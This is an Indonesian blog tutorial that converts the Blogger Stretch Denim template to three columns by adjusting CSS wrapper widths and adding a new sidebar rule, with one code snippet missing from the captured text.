Sepertinya untuk merubah template yang satu ini tidaklah susah, dibandingkan dengan template yang lainnya, sepertinya template yang satu ini sangat mudah untuk kita jadikan menjadi tiga kolom. Jadi jika kalian ingin mencoba Trik Hack ini. Langsung saja lihat di bawah.Untuk merubah template Streth Denim dan Streth Denim Light tentu berbeda dengan merubah template Denim dan Washed Denim. Lalu bagaimana untuk merubah template yang satu ini? Untuk merubahnya menjadi tiga kolom, ikuti trik berikut ini.Pertama, cari kode berikut:#main-wrapper {margin-left: 1%;width: 64%;float: left;background-color: $mainBgColor;display: inline; /* fix for doubling margin in IE */word-wrap: break-word; /* fix for long text breaking sidebar float in IE */overflow: hidden; /* fix for long non-text content breaking IE sidebar float */}#sidebar-wrapper {margin-right: 1%;width: 29%;float: right;background-color: $mainBgColor;display: inline; /* fix for doubling margin in IE */word-wrap: break-word; /* fix for long text breaking sidebar float in IE */overflow: hidden; /* fix for long non-text content breaking IE sidebar float */}Jika sudah, gantikan kode di atas sehingga menjadi seperti berikut:#main-wrapper {margin-left: 1%;width: 54%;float: left;background-color: $mainBgColor;display: inline; /* fix for doubling margin in IE */word-wrap: break-word; /* fix for long text breaking sidebar float in IE */overflow: hidden; /* fix for long non-text content breaking IE sidebar float */}#sidebar-wrapper {margin-right: 1%;width: 21%;float: right;background-color: $mainBgColor;display: inline; /* fix for doubling margin in IE */word-wrap: break-word; /* fix for long text breaking sidebar float in IE */overflow: hidden; /* fix for long non-text content breaking IE sidebar float */}#newsidebar-wrapper {margin-left: 1%;width: 21%;float: left;background-color: $mainBgColor;display: inline; /* fix for doubling margin in IE */word-wrap: break-word; /* fix for long text breaking sidebar float in IE */overflow: hidden; /* fix for long non-text content breaking IE sidebar float */}Jika sudah, selanjutnya tambahkan kode berikut di atas kode
Sudah selesai. Mudah kan?Ternyata Halaman Yang Ini Bagus Juga Untuk Di Cetak: Cetak Halaman IniMasukkan Email Kalian Untuk Mendapatkan Artikel-Artikel Seperti Di Atas:Delivered by FeedBurner[...]